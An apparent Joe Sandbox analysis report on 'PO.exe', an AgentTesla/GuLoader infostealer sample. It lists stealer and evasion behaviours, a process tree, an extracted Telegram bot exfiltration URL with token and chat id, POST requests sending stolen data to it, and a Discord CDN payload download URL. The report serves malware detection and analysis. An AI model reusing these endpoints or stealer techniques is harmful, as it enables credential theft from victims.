Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.exe

Overview

General Information

Sample Name:PO.exe
Analysis ID:756266
MD5:9297126fd9624f7dc2d4f64f072668a2
SHA1:c30b3c8fddd49f7dfba687026daf6293f6d90b1b
SHA256:edd8e1858bcc704fdea75837bb448eceda61317e7f8028e82aa2a0e5559c658a
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • PO.exe (PID: 5272 cmdline: C:\Users\user\Desktop\PO.exe MD5: 9297126FD9624F7DC2D4F64F072668A2)
    • CasPol.exe (PID: 7240 cmdline: C:\Users\user\Desktop\PO.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
{"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries
            No Sigma rule has matched
            Timestamp:192.168.11.20149.154.167.220498544432851779 11/29/22-22:50:36.593124
            SID:2851779
            Source Port:49854
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PO.exeVirustotal: Detection: 29%Perma Link
            Source: PO.exeReversingLabs: Detection: 26%
            Source: CasPol.exe.7240.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "561616954", "Chat URL": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument"}
            Source: CasPol.exe.7240.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendMessage"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010DD808 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010DDEF0 CryptUnprotectData,
            Source: PO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\PO.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneJump to behavior
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49854 version: TLS 1.2
            Source: PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004064C1 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004027FB FindFirstFileW,

            Networking

            barindex
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49854 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8dfHost: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c2ca67aceHost: api.telegram.orgContent-Length: 21528Expect: 100-continue
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
            Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
            Source: global trafficHTTP traffic detected: GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.89346370502.000000001DDA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000004.00000003.86340018468.00000000222CC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340222421.000000001D9FA000.00000004.00000800.00020000.00000000.sdmp, Cookies.4.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies.4.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bLCeYs.com
            Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000002.89318154724.0000000001563000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.85166822571.0000000001558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: PO.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89340758768.000000001DA29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000004.00000002.89339592068.000000001D9C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocumentdocument-----
            Source: CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
            Source: CasPol.exe, 00000004.00000002.89334284519.000000001C8F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx
            Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxT
            Source: CasPol.exe, 00000004.00000002.89317391968.0000000001506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocxt
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/8
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89339798750.000000001D9D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sFTel9k7EYFPshk.com
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sFTel9k7EYFPshk.comt-Wl
            Source: CasPol.exe, 00000004.00000002.89337792205.000000001D922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownHTTP traffic detected: POST /bot5088709131:AAFHCIxHU907RAI3XEaH2G6LgE9wrdrAgI0/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad25c20e8b8dfHost: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /attachments/1044649962652307570/1047171731867054230/bnezjstiSAD111.ocx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49854 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1C7E1010 SetWindowsHookExW 0000000D,00000000,?,?
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

            System Summary

            barindex
            Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: PO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\PO.exeFile created: C:\Windows\Handskedukker.iniJump to behavior
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00406846
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00404C59
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6D32
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0733
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C5308
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A7F0D
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6313
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0911
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6B6B
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A7F4C
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0545
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C5559
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A05A1
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A65B9
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6B86
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0784
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032BAD9A
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A09EE
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A05F0
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6BC8
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A67C1
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A07C7
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A802A
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0620
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0A26
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6C05
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A081A
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0670
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6C4E
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6243
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032AB2AB
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0AA9
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A06AC
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A08BF
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C648B
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A6C91
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A1CEB
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A06E2
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A70E7
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A0AFB
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C40FA
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A04F2
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A70C0
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032A1CDE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01044320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01043A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01043708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010B6968
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010BC318
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010B5A08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010B9708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010BC1C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010B81F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010BBAC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010B3EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D90BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D634C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010DAA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D4DD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D5F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010DF600
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D0032
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010DB3D2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010D46C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01136829
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0146B439
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01462768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01461FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0146DE78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01461AC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1C7EE9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1C7E6C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1C7E83C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D6C5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D6C46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D6C5D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D6C6AF1
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_032C63F1 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\PO.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: PO.exeVirustotal: Detection: 29%
            Source: PO.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
            Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exe
            Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe
            Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
